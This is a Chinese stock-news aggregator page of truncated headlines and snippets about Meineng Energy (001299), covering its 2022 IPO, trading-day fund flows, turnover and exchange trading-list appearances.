10月17日,陕西美能清洁能源集团股份有限公司(下称“美能能源”,SZ:001299)披露发行公告,并将于2022年10月18日开启申购。本次上市,美能能源的发行价为10.69元/股,发行市盈率20.

美能能源(001299)11月15日主力资金净卖出2095.05万元

截至2022年11月15日收盘,美能能源(001299)报收于20.1元,下跌1.03%,换手率21.43%,成交量10.05万手,成交额2.01亿元。11月15日的资金流向数据方面,主力资金净流出2

美能能源**深交所,实力营业部现身**榜(10-31)

深交所2022年10月31日交易***息显示,美能能源因属于无**涨跌幅**的证券而登上**榜。美能能源当收15.39元,涨跌幅为43.97%,换手率7.15%,振幅23.95%,成交额5142.

陕西又一城燃公司IPO过会,美能能源“内生式增长”成效几何?

华夏时报(www.chinatimes.net.cn)记者 苗诗雨 陆肖肖 北京报道继陕天然气(002267.SZ)后,陕西第二家区域性城燃公司即将于近日上市发售。天然气资源和油气资源丰富的陕西地区,

加码新能源领域投资 美能能源拟投建集团总部暨西安智慧能源研究院

本报记者 殷高峰11月14日,美能能源发布公告称,公司与西安高新区管委会拟签订《美能能源总部暨西安智慧能源研究院建设项目协议书》,公司计划在西安高新区上市企业园建设美能能源总部暨西安智慧能源研究院,总

多主力现身**榜,美能能源换手率达55.10%(11-25)

深交所2022年11月25日交易***息显示,美能能源因属于连续三个交易日内收盘**涨幅偏离值累计20%、当日换手率达到20%的证券而登上**榜。美能能源当收24.83元,涨跌幅为10.01%,换

多主力现身**榜,美能能源换手率达32.22%(05-29)

深交所2023年5月29日交易***息显示,美能能源因属于当日换手率达到20%的证券而登上**榜。美能能源当收18.72元,涨跌幅为3.43%,换手率32.22%,振幅12.43%,成交额2.73

11月7日美能能源(001299)**榜数据:机构净卖出1216.39万元

沪深交易所2022年11月7日公布的交易***息显示,美能能源(001299)因日换手率达到20%的前5只证券登上**榜。此次是近5个交易日内第3次上榜。截至2022年11月7日收盘,美能能源(001

上一篇: 最新:全球MEMS传感器产业链(力荐收藏) 下一篇: 真正炒股赚钱的只有一种人;长达20年只死记“七大步骤,八大选股”3分钟选股次次出手都是大牛
AD
更多相关文章

合天网安实验室

每日更新股票热点版块资讯信息

广告
最新文章

亲 , 欢迎光临...

股票大全 热点版块 热点标签 所有栏目